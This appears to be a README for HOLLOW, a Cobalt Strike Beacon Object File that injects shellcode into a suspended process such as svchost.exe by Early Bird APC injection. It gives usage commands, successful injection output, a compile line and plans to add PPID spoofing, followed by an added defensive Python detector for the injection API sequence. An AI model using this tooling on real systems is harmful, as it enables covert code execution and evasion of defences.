
HOLLOW BOF


Last updated 2 years ago

Authors:

  • Bobby Cooke

  • Justin Hamilton

  • Octavio Paguaga

  • Matt Kingstone

Beacon Object File (BOF) that spawns an arbitrary process from Beacon's memory in a suspended state, injects shellcode into it, hijacks the main thread with an APC, and executes the shellcode, using the Early Bird injection method taught by @SEKTOR7net in RED TEAM Operator: Malware Development Intermediate.

Run from Cobalt Strike Beacon Console

  • After compiling, import the hollow.cna script into Cobalt Strike's Script Manager

beacon> help hollow
Synopsis: hollow /path/to/hollow/pe /local/path/to/shellcode.bin
beacon> hollow svchost.exe /Users/bobby.cooke/popCalc.bin
[*] HOLLOW - EarlyBird Remote Process Shellcode Injector (@0xBoku|github.com/boku7) | (@JTHam0|github.com/Rodion0)
[*]             (@n00bRage|github.com/josephkingstone) | (@OakTree__|github.com/git-oaktree)
[*] Reading shellcode from: /Users/bobby.cooke/popCalc.bin
[+] Success - Spawned process for svchost.exe at 5464 (PID)
[+] Success - Allocated RE memory in remote process 5464 (PID) at: 0x000001A83BEC0000
[+] Success - Wrote 280 bytes to memory in remote process 5464 (PID) at 0x000001A83BEC0000
[+] Success - APC queued for main thread of 5464 (PID) to shellcode address 0x000001A83BEC0000
[+] Success - Your thread was resumed and your shellcode is being executed within the remote process!
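From the defender's side, the console output above spells out the Early Bird chain as an ordered sequence (spawn suspended, allocate executable memory in the child, write to it, queue an APC on the main thread, resume), which is exactly what a monitor can look for in per-process API telemetry. The detector below is an added example, not code from the HOLLOW BOF or Cobalt Strike; the trace, the event layout and the field names are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample API trace: (source_pid, api, target_pid, details).
# The first five events mirror the HOLLOW console output above (svchost.exe,
# PID 5464, 280 bytes); the last two are a benign, unrelated process pair.
SAMPLE_TRACE = [
    (4120, "CreateProcessA", 5464, {"flags": "CREATE_SUSPENDED", "image": "svchost.exe"}),
    (4120, "VirtualAllocEx", 5464, {"protect": "PAGE_EXECUTE_READ"}),
    (4120, "WriteProcessMemory", 5464, {"size": 280}),
    (4120, "QueueUserAPC", 5464, {"thread": "main"}),
    (4120, "ResumeThread", 5464, {}),
    (7001, "CreateProcessA", 7002, {"flags": "0", "image": "notepad.exe"}),
    (7001, "WriteProcessMemory", 7002, {"size": 16}),
]

EXEC_PROTECTIONS = {"PAGE_EXECUTE", "PAGE_EXECUTE_READ", "PAGE_EXECUTE_READWRITE"}

# Ordered stages of the Early Bird chain: spawn suspended, allocate executable
# memory in the child, write into it, queue an APC, resume the main thread.
# Each stage is (API-name prefix, predicate over the event's details).
STAGES = (
    ("CreateProcess", lambda d: "CREATE_SUSPENDED" in d.get("flags", "")),
    ("VirtualAllocEx", lambda d: d.get("protect") in EXEC_PROTECTIONS),
    ("WriteProcessMemory", lambda d: True),
    ("QueueUserAPC", lambda d: True),
    ("ResumeThread", lambda d: True),
)

def scan_trace(trace):
    """Map each (source_pid, target_pid) pair to the number of stages completed in order."""
    progress = defaultdict(int)
    for src, api, dst, details in trace:
        key = (src, dst)
        idx = progress[key]
        if idx < len(STAGES):
            prefix, matches = STAGES[idx]
            # Only the next expected stage advances the state, so out-of-order or
            # partial activity (e.g. a lone remote write) never completes the chain.
            if api.startswith(prefix) and matches(details):
                progress[key] = idx + 1
    return dict(progress)

def detect_early_bird(trace):
    """Return the (source_pid, target_pid) pairs that completed the whole chain."""
    return [pair for pair, done in scan_trace(trace).items() if done == len(STAGES)]

if __name__ == "__main__":
    for src, dst in detect_early_bird(SAMPLE_TRACE):
        print(f"[!] Early Bird APC injection pattern: PID {src} -> PID {dst}")
```

Real telemetry (ETW, Sysmon, an EDR sensor) will name these events differently, so the stage table is the part to adapt; the ordered-progress logic stays the same.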

Compile with x64 MinGW (only tested from macOS):

x86_64-w64-mingw32-gcc -c hollow.x64.c -o hollow.x64.o

To Do List

  • Refactor code to make it more modular/clean

  • Implement this into github.com/boku7/SPAWN

    • Combine this with the PPID spoofing and blockdll features of SPAWN

Credits / References

  • Credit/shoutout to: @SEKTOR7net + Raphael Mudge

Sektor7 Malware Dev Essentials course - where the Early Bird injection technique was learned

  • https://institute.sektor7.net/red-team-operator-malware-development-essentials

Raphael Mudge - Beacon Object Files - Luser Demo

  • https://www.youtube.com/watch?v=gfYswA_Ronw

Cobalt Strike - Beacon Object Files

  • https://www.cobaltstrike.com/help-beacon-object-files

BOF Code References

  • https://github.com/odzhan/injection/blob/master/syscalls/inject_dll.c

  • https://github.com/ajpc500/BOFs/blob/main/SyscallsInject/entry.c

  • https://github.com/ajpc500/BOFs/blob/main/SyscallsInject/syscalls_inject.cna
